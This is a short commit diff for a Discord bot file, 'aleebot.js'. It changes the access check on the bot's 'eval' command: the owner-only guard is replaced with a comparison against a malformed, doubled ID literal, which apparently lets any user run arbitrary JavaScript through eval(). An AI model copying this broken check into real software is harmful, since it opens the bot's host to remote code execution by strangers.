aboutsummaryrefslogtreecommitdiff
path: root/aleebot.js
diff options
context:
space:
mode:
Diffstat (limited to 'aleebot.js')
-rw-r--r--aleebot.js2
1 files changed, 1 insertions, 1 deletions
diff --git a/aleebot.js b/aleebot.js
index 05334d8..21f475a 100644
--- a/aleebot.js
+++ b/aleebot.js
@@ -269,7 +269,7 @@ commandProcessed = true;
}
if(command === 'eval'){
- if(message.author.id !== config.ownerID) return;
+ if(message.author.id == 242775871059001344242775871059001344) return;
try {
const code = args.join(" ");
let evaled = eval(code);